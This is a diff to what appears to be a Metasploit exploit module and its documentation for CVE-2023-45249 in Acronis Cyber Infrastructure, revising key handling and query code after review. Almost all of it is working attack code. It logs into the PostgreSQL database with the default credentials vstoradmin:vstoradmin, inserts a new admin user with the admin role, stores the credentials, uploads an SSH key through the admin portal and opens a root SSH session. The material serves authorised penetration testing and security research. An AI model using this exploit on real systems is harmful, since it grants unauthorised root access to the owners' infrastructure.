fourth release addressing review comments of jheysel-r7

Author: h00die-gr3y

documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md

@@ -53,8 +53,13 @@ This option is required and is PostgreSQL database port (default: 5432) to conne
 ### SSHPORT
 This option is required and is the SSH port (default: 22) to establish a SSH session.
 
-### STORE_CRED
-This option is optional (default: true) and stores the new created admin credentials in the msf database.
+### PRIV_KEY
+This option is optional and allows the use of your own SSH private key.
+If no key is provided, a private SSH key will be generated.
+
+### PUB_KEY
+This option is optional and allows the use of your own SSH public key.
+If no key is provided, a public SSH key will be generated.
 
 ## Scenarios
 ```msf
@@ -96,15 +101,16 @@ Basic options:
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DATABASE    keystone         yes       The database to authenticate against
-  DBPORT      5432             yes       PostgreSQL DB port
+  DBPORT      6432             yes       PostgreSQL DB port
   PASSWORD    vstoradmin       no        The password for the specified username. Leave blank for a random password.
+  PRIV_KEY                     no        SSH Private Key
+  PUB_KEY                      no        SSH Public Key
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                          cs/using-metasploit.html
   RPORT       8888             yes       The target port (TCP)
   SSHPORT     22               yes       SSH port
   SSL         true             no        Negotiate SSL/TLS for outgoing connections
-  STORE_CRED  true             no        Store user admin credentials into the database.
   TARGETURI   /                yes       Path to the Acronis Cyber Infra application
   USERNAME    vstoradmin       yes       The username to authenticate as
   VHOST                        no        HTTP server virtual host

modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb

@@ -93,66 +93,56 @@ def initialize(info = {})
     deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
     register_options([
       OptString.new('TARGETURI', [true, 'Path to the Acronis Cyber Infra application', '/']),
-      OptBool.new('STORE_CRED', [false, 'Store user admin credentials into the database.', true]),
-      OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 5432]),
-      OptPort.new('SSHPORT', [true, 'SSH port', 22])
+      OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 6432]),
+      OptPort.new('SSHPORT', [true, 'SSH port', 22]),
+      OptString.new('PUB_KEY', [false, 'SSH Public Key', '']),
+      OptString.new('PRIV_KEY', [false, 'SSH Private Key', ''])
     ])
     register_advanced_options([
       OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])
     ])
   end
 
-  def run_query(query)
-    @res_query = postgres_query(query)
-    case @res_query.keys[0]
-    when :conn_error
-      vprint_error("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Connection error.")
-      return false
-    when :sql_error
-      vprint_warning("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Unable to execute query: #{query}.")
-      elog(@res_query[:sql_error])
-      return false
-    when :complete
-      vprint_good("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Query: #{query} successful.")
-      return true
-    else
-      vprint_error("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Unknown.")
-      return false
-    end
-  end
-
   # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
   def add_admin_user(username, userid, password)
     vprint_status("Creating admin user #{username} with userid #{userid}")
 
     # add new admin user to the user table
-    return false unless run_query("insert into \"user\" values(\'#{userid}\','{}','T',NULL,NULL,NULL,'default');")
+    res_query = postgres_query("INSERT INTO \"user\" VALUES(\'#{userid}\','{}','T',NULL,NULL,NULL,'default');", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
     # add new admin user to the local_user table
-    return false unless run_query('select * from "local_user" where id = ( select MAX (id) from "local_user" );')
+    res_query = postgres_query('SELECT * FROM "local_user" WHERE id = ( SELECT MAX (id) FROM "local_user" );', datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
-    id_luser = @res_query[:complete].rows[0][0].to_i + 1
-    return false unless run_query("insert into \"local_user\" values(#{id_luser},\'#{userid}\','default',\'#{username}\',NULL,NULL);")
+    id_luser = res_query[:complete].rows[0][0].to_i + 1
+    res_query = postgres_query("INSERT INTO \"local_user\" VALUES(\'#{id_luser}\',\'#{userid}\','default',\'#{username}\',NULL,NULL);", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
     # hash the password
     password_hash = Password.create(password)
     today = Date.today
     vprint_status("Setting password #{password} with hash #{password_hash}")
-    return false unless run_query('select * from "password" where id = ( select MAX (id) from "password" );')
+    res_query = postgres_query('SELECT * FROM "password" WHERE id = ( SELECT MAX (id) FROM "password" );', datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
-    id_pwd = @res_query[:complete].rows[0][0].to_i + 1
-    return false unless run_query("insert into \"password\" values(#{id_pwd},#{id_luser},NULL,'F',\'#{password_hash}\',0,NULL,DATE \'#{today}\');")
+    id_pwd = res_query[:complete].rows[0][0].to_i + 1
+    res_query = postgres_query("INSERT INTO \"password\" VALUES(\'#{id_pwd}\',\'#{id_luser}\',NULL,'F',\'#{password_hash}\',0,NULL,DATE \'#{today}\');", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
     # Getting the admin roles and assign this to the new admin user
     vprint_status('Getting the admin roles')
-    return false unless run_query("select * from \"project\" where name = 'admin' and domain_id = 'default';")
+    res_query = postgres_query("SELECT * FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
-    id_project_role = @res_query[:complete].rows[0][0]
-    return false unless run_query("select * from \"role\" where name = 'admin';")
+    id_project_role = res_query[:complete].rows[0][0]
+    res_query = postgres_query("SELECT * FROM \"role\" WHERE name = 'admin';", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
-    id_admin_role = @res_query[:complete].rows[0][0]
+    id_admin_role = res_query[:complete].rows[0][0]
     vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}")
-    return false unless run_query("insert into \"assignment\" values('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F')")
+    res_query = postgres_query("INSERT INTO \"assignment\" VALUES('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F');", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
     vprint_status("Successfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")
     true
@@ -292,32 +282,43 @@ def exploit
     print_status("Creating admin user #{username} with password #{password} for access at the Acronis Admin Portal.")
     fail_with(Failure::BadConfig, "Adding admin credentials #{username}:#{password} failed.") unless add_admin_user(username, userid, password)
 
-    # Storing credentials in the msf database
-    if datastore['STORE_CRED']
-      print_status('Saving admin credentials at the msf database.')
-      store_valid_credential(user: username, private: password)
-    end
+    # storing credentials at the msf database
+    print_status('Saving admin credentials at the msf database.')
+    store_valid_credential(user: username, private: password)
 
     # log out from the postsgreSQL DB
     postgres_logout if postgres_conn
 
-    # create SSH key pair
-    print_status('Creating SSH private and public key.')
-    k = SSHKey.generate
-    vprint_status(k.private_key)
-    vprint_status("#{k.ssh_public_key} root")
+    # create or use user provided SSH key pair
+    if datastore['PUB_KEY'].blank? || datastore['PRIV_KEY'].blank?
+      print_status('Creating SSH private and public key.')
+      k = SSHKey.generate
+      priv_key = k.private_key
+      pub_key = "#{k.ssh_public_key} root"
+    else
+      print_status('Using user provided SSH private and public key.')
+      priv_key = datastore['PRIV_KEY']
+      pub_key = "#{datastore['PUB_KEY']} root"
+    end
+    vprint_status(priv_key)
+    vprint_status(pub_key)
+
+    # storing SSH public and private key at the msf database
+    print_status('Saving SSH public and private key pair at the msf database.')
+    store_valid_credential(user: 'ACI SSH public key', private: pub_key)
+    store_valid_credential(user: 'ACI SSH private key', private: priv_key)
 
     # log in with the new admin user credentials at the Acronis Admin Portal
     fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)
 
     # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH
     print_status('Uploading SSH public key at the Acronis Admin Portal.')
-    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey("#{k.ssh_public_key} root")
+    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(pub_key)
 
     # login with SSH private key to establish SSH root session
     ssh_opts = ssh_client_defaults.merge({
       auth_methods: ['publickey'],
-      key_data: [ k.private_key ],
+      key_data: [ priv_key ],
       port: datastore['SSHPORT']
     })
     ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']